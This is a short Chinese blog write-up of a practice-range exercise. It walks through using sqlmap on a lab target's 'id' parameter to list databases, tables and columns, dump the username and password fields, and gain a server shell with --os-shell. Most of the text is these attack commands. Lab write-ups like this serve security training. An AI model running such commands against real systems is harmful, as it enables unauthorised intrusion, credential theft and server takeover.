WriteUp:Kali渗透 - 通过Sqlmap直接获得服务器权限
靶场链接:https://hack.zkaq.cn/battle/target?id=aabe6f2bda75107c
使用sqlmap进行渗透测试
-
找到可能存在注入点的网站,http://59.63.200.79:6453/single.php?id=1放到sqlmap上跑:
sqlmap -u "http://59.63.200.79:6453/single.php?id=1"发现三个SQL漏洞:

-
爆库:
sqlmap -u "http://59.63.200.79:6453/single.php?id=1" --dbs -
爆表:
sqlmap -u "http://59.63.200.79:6453/single.php?id=1" -D cake --tables --batch -
爆字段:
sqlmap -u "http://59.63.200.79:6453/single.php?id=1" -D cake -T user --columns --batch -
爆值:
sqlmap -u "http://59.63.200.79:6453/single.php?id=1" -D cake -T user -C username --dump --batchsqlmap -u "http://59.63.200.79:6453/single.php?id=1" -D cake -T user -C passwd --dump --batch -
获取服务器权限:
sqlmap -u "http://59.63.200.79:6453/single.php?id=1" --os-shell


是PHP,输入4
-
为所欲为
本文来自博客园,作者:{Zeker62},转载请注明原文链接:https://www.cnblogs.com/Zeker62/p/15167736.html

浙公网安备 33010602011771号